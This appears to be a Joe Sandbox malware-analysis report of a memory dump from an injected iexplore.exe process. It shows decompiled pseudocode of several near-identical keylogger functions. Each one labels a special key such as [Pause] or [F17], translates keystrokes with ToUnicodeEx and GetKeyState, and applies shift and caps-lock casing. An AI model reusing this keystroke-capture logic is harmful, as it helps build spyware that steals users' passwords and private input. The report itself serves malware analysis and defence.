Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Play / Pause], xrefs: 00C85CD1
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8588F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8588F(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Execute]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Execute], xrefs: 00C85891

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85B7B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B7B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F21]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F21], xrefs: 00C85B7D

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85B26, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B26(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F17]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F17], xrefs: 00C85B28

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85CE0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CE0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Previous Track]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Previous Track], xrefs: 00C85CE2

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85A49, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A49(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Context Menu]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Context Menu], xrefs: 00C85A4B

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85D35, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D35(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Pause]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

